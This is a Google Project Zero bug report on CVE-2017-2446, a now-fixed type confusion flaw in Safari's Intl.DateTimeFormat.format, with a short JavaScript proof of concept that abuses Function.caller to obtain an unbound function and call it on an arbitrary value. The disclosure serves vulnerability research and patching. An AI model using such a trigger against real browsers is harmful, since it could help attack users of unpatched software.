1036 - Safari Browser: Type Confusion in DateTimeFormat.format - project-zero

Starred by 1 user

Status:	Fixed
Owner:	natashenka@google.com
Closed:	Mar 2017
Cc:	project-...@google.com
Finder-natashenka Deadline-90 Vendor-Apple Product-Safari CCProjectZeroMembers Severity-High Reported-2017-Jan-5 CVE-2017-2446

Safari Browser: Type Confusion in DateTimeFormat.format

Project Member Reported by natashenka@google.com, Dec 10 2016

Back to list

There is a type confusion vulnerability when calling DateTimeFormat.format. This function is provided as a bound function by a getter in the DateTimeFormat class. Binding the function ensures that the this object is of the right type. However, when the bound function is called, it calls into user script when converting the date parameter, which can call Function.caller, obtaining the unbound function. This type unsafe function can then be called on any type.

A minimal PoC is as follows, and a full PoC is attached. 


var i = new Intl.DateTimeFormat();
var q;

function f(){
	q = f.caller;
	return 10;
}


i.format({valueOf : f});

q.call(0x77777777);

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

datetimeformat.html
346 bytes View Download

Project Member Comment 1 by natashenka@google.com, Mar 9 2017

Labels: -Reported-2016-Dec-9 Reported-2016-Jan-5

Project Member Comment 2 by scvitti@google.com, Mar 16 2017

Labels: -Reported-2016-Jan-5 Reported-2017-Jan-5

Project Member Comment 3 by natashenka@google.com, Mar 27 2017

Labels: -Restrict-View-Commit CVE-2017-2446
Status: Fixed

Fixed: https://support.apple.com/en-us/HT207617

► Sign in to add a comment